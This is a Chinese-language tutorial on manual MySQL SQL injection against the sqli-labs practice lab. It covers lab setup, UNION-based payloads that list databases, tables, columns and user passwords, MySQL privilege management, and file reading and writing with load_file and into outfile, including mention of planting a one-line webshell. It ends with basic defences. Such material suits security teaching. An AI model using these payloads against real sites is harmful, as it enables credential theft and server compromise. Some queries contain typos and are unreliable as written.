当前位置: 首页 > article >正文

SQL注入零基础学习二MYSQL手工注入

1.SQL注入之sqli-labs环境搭建

1.Sqli-labs项目地址—Github获取:GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

Sqli-labs环境安装
需要安装以下环境
apache+mysql+php
Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn)

2.下载好之后将Sqli-labs项目放到phpstudy的WWW目录下

4.要想phpstudy中自带mysql正常使用,需确保本地没有下载mysql服务器,如有需要关闭本地mysql服务,防止端口占用!

5.进入sql-connections找到db-creds文件进行配置,phpstudy中默认账号和密码为 root

6.phpstudy自带的php版本过高,不兼容sqli-las靶场中php的版本,需要手动设置为低版本

7.检查是否更换好:点击 网站  --> 管理 --> php版本 -->

8.启动apache和mysql

9.打开网页127.0.0.1/sqli_labs_sqli-php7/

2.SQL注入之MySQL手工注入

浏览器 进行数据提交  服务器  :
get 提交  :  url   数据长度受限制(速度快;用于:数据不敏感,安全不敏感)
post 提交 : 服务器    安全性高   数据量大 

2.1注入流程:

1.判断注入点

2.猜解列名数量 order by

3.报错猜解,判断回显点

4.信息收集

5.使用对应的SQL语句执行注入查询

2.2注入语句

sqli-labs数字型注入

尝试手工注入:
        SQL注入: 
        1.判断有无注入点   and 1 = 1;
        2.猜解列名数量 order by %20 空格
        3.报错,判断回显点 union 
        4.信息收集 
          查询数据库版本 version()
?id=-1 union select 1,version(),3
          高版本:5.0以上,有系统库:infromation
          低版本:5.0一下无系统库
        5.使用对应SQL进行注入
               注意:= 前后 连到一起,字符 转行 16进制
         (1) 查询数据库名称:database()
?id=-1 union select 1,version(),database()
         (2)查询查找表名 
select 
table_name from infromation_schema.tables where table_schema=database();
SQL:
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
         (3)查询表里面有哪些字段
select column_name from information_schema.column where tabel_name=users;
SQL:
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273
         (4)查询字段username,password数据
 select username,password from users
SQL:
?id=-1 union select 1,2,(select group_concat(username,0x3a,password)from users)

3.SQL注入之高权限注入上

3.1多个网站共享mysql服务器

root用户拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。

3.2MySQL 权限级别分为:  

全局性的管理权限: 作用于整个MySQL实例级别 
数据库级别的权限: 作用于某个指定的数据库上或者所有的数据库上 
数据库对象级别的权限:作用于指定的数据库对象上(表、视图等)或者所有的数据库对象
 

3.3MySQL 权限介绍

mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,

User表:存放用户账户信息以及全局级别(所有数据库)权限,决定了来自哪些主机的哪些用户可以访问数据库实例,如果有全局权限则意味着对所有数据库都有此权限 

Db表:存放数据库级别的权限,决定了来自哪些主机的哪些用户可以访问此数据库 

Tables_priv表:存放表级别的权限,决定了来自哪些主机的哪些用户可以访问数据库的这个表 

Columns_priv表:存放列级别的权限,决定了来自哪些主机的哪些用户可以访问数据库表的这个字段 

Procs_priv表:存放存储过程和函数级别的权限
 

3.3.1mysql权限表的验证过程为:

先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。
通过身份认证后,进行权限分配,
按照user,db,tables_priv,columns_priv的顺序进行验证。
即先检查全局权限表user,如果user中对应的权限为Y,则此用户对所有数据库的权限都为Y,
将不再检查db, tables_priv,columns_priv;如果为N,则到db表中检查此用户对应的具体数据      库,
并得到db中为Y的权限;如果db中为N,则检查tables_priv中此数据库对应的具体表,取得表中的权限Y,以此类推。

3.4MySQL权限的增删改查

3.4.1查看mysql 有哪些用户:

    select user,host from mysql.user;

3.4.2查看用户对应权限

    select * from user where user='root' and host='localhost'\G;  #所有权限都是Y ,就是什么权限都有

3.4.3创建 mysql 用户

    有两种方式创建MySQL授权用户

    执行create user/grant命令(推荐方式)
    CREATE USER 'test1'@'localhost' IDENTIFIED BY '123456';

    通过insert语句直接操作MySQL系统权限表

3.4.4只提供id查询权限

    grant select(id) on test.t1 to test1@'localhost' identified by '123456';

3.4.5把普通用户变成管理员

    GRANT ALL PRIVILEGES ON *.* TO 'test1'@'localhost' WITH GRANT OPTION;

3.4.6删除用户

    drop user finley@'localhost';

4.SQL注入之高权限注入下

4.1.查询所有数据库名称

?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

4.2.查询数据库对应的表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x74657374

4.3.查询表名对应的字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7431

4.4.查询数据

?id=-1 union select 1,name,password from test.t1

5.SQL注入之文件读写

文件读写注入的原理

就是利用文件的读写权限进行注入,它可以写入一句话木马,也可以读取系统文件的敏感信息。

文件读写注入的条件

高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限

show global variables like '%secure%'  查看mysql全局变量的配置

读写文件需要 `secure_file_priv`权限

`secure_file_priv=`

代表对文件读写没有限制

`secure_file_priv=NULL`

代表不能进行文件读写

`secure_file_priv=d:/phpstudy/mysql/data`

代表只能对该路径下文件进行读写

5.2读取文件

使用函数:`load_file()`

?id=-1 union select 1,load_file('d:/d.txt),3

注意:路径中斜杠是/不是\。后面的路径可以是单引号,0x,char转换的字符。

5.3写入文件

使用函数:`Into Outfile`(能写入多行,按格式输出)
                  `into Dumpfile`(只能写入一行且没有输出格式)

?id=-1 union select 1,'xy',3 into outfile 'D:/d.txt'--+

outfile 后面不能接0x开头或者char转换以后的路径,只能是单引号路径

6. SQL注入之基础防御

6.1魔术引号

魔术引号(Magic Quote)是一个自动将进入 PHP 脚本的数据进行转义的过程。
最好在编码时不要转义而在运行时根据需要而转义。

魔术引号:在php.ini文件内找到
 

magic_quotes_gpc = On 开启        将其改为        magic_quotes_gpc = Off 关闭

6.2内置函数

做数据类型的过滤

is_int()等

addslashes()

mysql_real_escape_string()

mysql_escape_string()

6.3自定义关键字

str_replace()

6.4其他安全防护软件

WAF 等等;
 

相关文章:

SQL注入零基础学习二MYSQL手工注入

1.SQL注入之sqli-labs环境搭建 1.Sqli-labs项目地址—Github获取:GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based. Sqli-labs环境安装 需要安装以下环境 apachemysqlphp Windows版phpstudy下载 - 小皮面板(phpstudy…...

可以媲美YOLO的开源实时目标检测模型:RF-DETR,在 COCO 上达到 SOTA 水平,并专为微调设计

RF-DETR:SOTA 实时目标检测模型 RF-DETR 是由 Roboflow 开发并基于 Transformer 的实时目标检测模型架构,采用 Apache 2.0 许可证发布。 RF-DETR 是第一个在 Microsoft COCO 基准测试中超过 60 AP 的实时模型,同时在基础尺寸下具有竞争力。…...

【hadoop】hadoop streaming

API: https://hadoop.apache.org/docs/stable/hadoop-streaming/HadoopStreaming.html(hadoop3) https://cwiki.apache.org/confluence/display/HADOOP2/HadoopStreaming(hadoop2) hadoop version查看hadoop版本&#…...

Unity-RectTransform设置UI width

不知道有没人需要这样的代码,就是.sizeDelta //不确定是不是英文翻译的原因,基本很难理解,sizeDeltaSize,//未必完全正确,但这么写好像总没错过 //image 在一个UnityEngine.UI.Image 的数组内foreach (var image in l…...

开发中后端返回下划线数据,要不要统一转驼峰?

先说结论。看情况!!!! 前端 主要用 JS/TS 建议后端返回 camelCase,减少前端转换成本。后端 主要是 Python/Go 建议保持 snake_case,前端做转换。但是团队统一风格最重要!如果统一返回驼峰就驼峰…...

【现代深度学习技术】现代卷积神经网络04:含并行连接的网络(GoogLeNet)

【作者主页】Francek Chen 【专栏介绍】 ⌈ ⌈ ⌈PyTorch深度学习 ⌋ ⌋ ⌋ 深度学习 (DL, Deep Learning) 特指基于深层神经网络模型和方法的机器学习。它是在统计机器学习、人工神经网络等算法模型基础上,结合当代大数据和大算力的发展而发展出来的。深度学习最重…...

链表-LeetCode

这里写目录标题 1 排序链表1.1 插入法 O(n)1.2 归并排序 1 排序链表 1.1 插入法 O(n) /*** Definition for singly-linked list.* struct ListNode {* int val;* ListNode *next;* ListNode() : val(0), next(nullpt…...

TypeScript 与 JavaScript 对比

核心概念对比 JavaScript 语言类型:动态类型脚本语言诞生时间:1995年(ES1标准)类型系统:运行时类型检查文件扩展名:.js编译需求:无需编译,直接执行 TypeScript 语言类型&#xf…...

Selenium之Web Driver常用属性

Web Driver常用属性 在上一篇文章里我们安装并且使用了selenium来操控浏览器;这一节我们来看一下Driver的一些常用属性;可以方便和浏览器进行交互 废话不多说,下面以实践为主 获取浏览器名称 browser_name browser.name print(browser_n…...

EF Core 执行原生SQL语句

文章目录 前言一、执行查询&#xff08;返回数据&#xff09;1&#xff09; 使用 FromSqlRaw或 FromSqlInterpolated 方法&#xff0c;适用于 DbSet<T>&#xff0c;返回实体集合。2&#xff09;结合 LINQ 查询 二、执行非查询操作&#xff08;增删改&#xff09;1&#x…...

新版 eslintrc 文件弃用 .eslintignore已弃用 替代方案

1.进入eslint.config.mjs文件 2.import { defineConfig, globalIgnores } from "eslint/config"; 引入globalIgnores 3.配置 defineConfig([ ... globalIgnores([ "config/*", ".husky", ".local", "public/*", ".…...

Python二分查找【清晰易懂】

1. 二分查找是什么&#xff1f; 想象你在玩“猜数字”游戏&#xff1a; 对方心里想一个 1~100 的数字&#xff0c;你每次猜一个数&#xff0c;对方会告诉你是“大了”还是“小了”。 最快的方法&#xff1a;每次都猜中间的数&#xff01;比如第一次猜50&#xff0c;如果大了&…...

Azure SDK 使用指南

​Azure SDK&#xff08;软件开发工具包&#xff09;是一组由微软提供的工具和库&#xff0c;旨在帮助开发者以多种编程语言&#xff08;如 .NET、Java、Python、JavaScript 等&#xff09;与 Azure 服务进行交互。 ​通过使用 Azure SDK&#xff0c;开发者可以更高效地构建、部…...

【STL】vector介绍(附部分接口模拟实现)

文章目录 1.介绍2.使用2.1 vector的构造2.2 vector空间相关接口2.2.1 size()2.2.2 capacity()2.2.3 empty()2.2.4 resize()2.2.5 reserve() 2.3 vector的增删查改2.3.1 push_back()2.3.2 insert()2.3.3 pop_back()2.3.4 erase()2.3.5 swap()2.3.6 operator[]注&#xff1a;关于…...

一周掌握Flutter开发--8. 调试与性能优化(上)

文章目录 8. 调试与性能优化核心技能8.1 使用 Flutter DevTools 分析性能8.2 检查 Widget 重绘&#xff08;debugPaintSizeEnabled&#xff09;8.3 解决 ListView 卡顿&#xff08;ListView.builder itemExtent&#xff09; 其他性能优化技巧8.4 减少 build 方法的调用8.5 使用…...

游戏引擎学习第182天

回顾和今天的计划 昨天的进展令人惊喜&#xff0c;原本的调试系统已经被一个新的系统完全替换&#xff0c;新系统不仅能完成原有的所有功能&#xff0c;还能捕获完整的调试信息&#xff0c;包括时间戳等关键数据。这次的替换非常顺利&#xff0c;效果很好。 今天的重点是在此基…...

2025计算机毕设全流程实战指南:Java/Python+协同过滤+小程序开发避坑手册​

技术框架的选择是项目开发的关键起点&#xff0c;直接影响开发效率和最终成果质量。然而&#xff0c;许多开发者在选择技术框架时面临困难&#xff1a;现有知识储备不足以支撑复杂项目需求&#xff0c;团队经验有限&#xff0c;框架选择缺乏前瞻性常导致后期问题。尽管技术框架…...

C语言_数据结构_二叉树

【本节目标】 树的概念及结构 二叉树的概念及结构 二叉树的顺序结构及实现 二叉树的链式结构及实现 1. 树的概念及结构 1.1 树的概念 树是一种非线性的数据结构&#xff0c;它是由n&#xff08;n>0&#xff09;个有限结点组成一个具有层次关系的集合。把它叫做树是因为…...

Compare全目录文件比较内容(项目中用到过)

第一步&#xff1a;找到“会话”——“会话设置” 会话设置弹框信息 第二步&#xff1a;选择“比较”tab标签 比较内容&#xff1a;选中二进制比较 第三步&#xff1a;选中所有文件 第四步&#xff1a;右键选中“比较内容” 第五步&#xff1a;选中“基于规则的比较”...

3.26[a]paracompute homework

5555 负载不平衡指多个线程的计算量差异显著&#xff0c;导致部分线程空转或等待&#xff0c;降低并行效率。其核心矛盾在于任务划分的静态性与计算动态性不匹配&#xff0c;尤其在处理不规则数据或动态任务时尤为突出。以稀疏矩阵的向量乘法为例&#xff0c;假设其非零元素分…...

视觉大模型CLIP论文精读

论文&#xff1a;Learning Transferable Visual Models From Natural Language Supervision 代码&#xff1a;https://github.com/openai/CLIP 摘要 最先进的计算机视觉系统是针对预测一组固定的、预先确定的对象类别进行训练的。这种受限的监督形式限制了它们的通用性和可用…...

【AI】Orin NX+ubuntu22.04上移植YoloV11,并使用DeepStream测试成功

【AI】郭老二博文之:AI学习目录汇总 1、烧写系统 新到的开发板,已经烧写好Ubuntu系统,版本为22.04。 如果没有升级到Ubuntu22.04,可以在电脑Ubuntu系统中使用SDKManager来烧写Ubuntu系统,网络情况好的话,也可以直接将CUDA、cuDNN、TensorRT、Deepstream等也安装上。 2…...

HTML文档流

1. 基础定义 “文档流(Normal Flow)是指HTML元素在页面中默认的排列方式。在标准文档流中&#xff0c;块级元素会从上到下垂直排列&#xff0c;每个元素占据一整行&#xff1b;而行内元素则从左到右水平排列&#xff0c;直到空间不足才会换行。” 2. 详细解释 可以进一步展开…...

链表的创建:头插法与尾插法详解(数据结构)

C 链表的创建&#xff1a;头插法与尾插法详解 链表&#xff08;Linked List&#xff09;是一种重要的数据结构&#xff0c;适用于插入和删除操作频繁的场景。本文介绍 两种常见的链表构建方法&#xff1a; 尾插法&#xff08;Append / Tail Insertion&#xff09;&#xff1a;…...

MyBatis中mapper.xml 的sql映射规则

一、SQL 映射文件核心元素 MyBatis 映射文件的顶级元素&#xff08;按定义顺序&#xff09;&#xff1a; cache&#xff1a;命名空间的缓存配置。cache-ref&#xff1a;引用其他命名空间的缓存。resultMap&#xff1a;自定义结果集映射。sql&#xff1a;可重用的 SQL 片段。i…...

深入解析 Java 类加载机制及双亲委派模型

&#x1f50d; Java的类加载机制是确保应用程序正确运行的基础&#xff0c;特别是双亲委派模型&#xff0c;它通过父类加载器逐层加载类&#xff0c;避免冲突和重复加载。但在某些特殊场景下&#xff0c;破坏双亲委派模型会带来意想不到的效果。本文将深入解析Java类加载机制、…...

糖尿病大模型预测及临床应用研究智能管理系统技术文档

目录 1. 数据工程规范1.1 多源数据集成1.2 特征工程架构 2. 核心模型架构2.1 分层预测网络2.2 动态血糖预测模块 3. 实时决策系统3.1 术中预警协议3.2 麻醉方案优化器 4. 验证体系实现4.1 数字孪生验证平台4.2 临床验证流程 5. 系统部署方案5.1 边缘计算架构5.2 性能指标 6. 安…...

MySQL数据库精研之旅第四期:解锁库操作高阶技能

专栏&#xff1a;MySQL数据库成长记 个人主页&#xff1a;手握风云 目录 一、查看所有表 1.1. 语法 二、创建表 2.1. 语法 2.2. 示例 2.3. 表在磁盘上对应的⽂件 三、查看表结构 3.1. 语法 3.2. 示例 四、修改表 4.1. 语法 4.2. 示例 五、删除表 5.1. 语法 5.2.…...

【DevOps】DevOps and CI/CD Pipelines

DevOps 是一种将开发与运维实践相结合的模式&#xff0c;旨在缩短软件开发周期并交付高质量软件。 DevOps 是什么&#xff1f; 开发团队与运维团队之间的协作 • 持续集成与持续交付&#xff08;CI/CD&#xff09; • 流程自动化 • 基础设施即代码&#xff08;IaC&#xff09;…...

Oracle详解

Oracle 数据库是一款由 Oracle 公司开发和维护的关系数据库管理系统&#xff08;RDBMS&#xff09;。Oracle 数据库广泛应用于企业级应用中&#xff0c;尤其是在需要高可用性、高性能和安全性的场景。以下是对 Oracle 数据库的详细介绍&#xff0c;包括它的各个方面。 一、Ora…...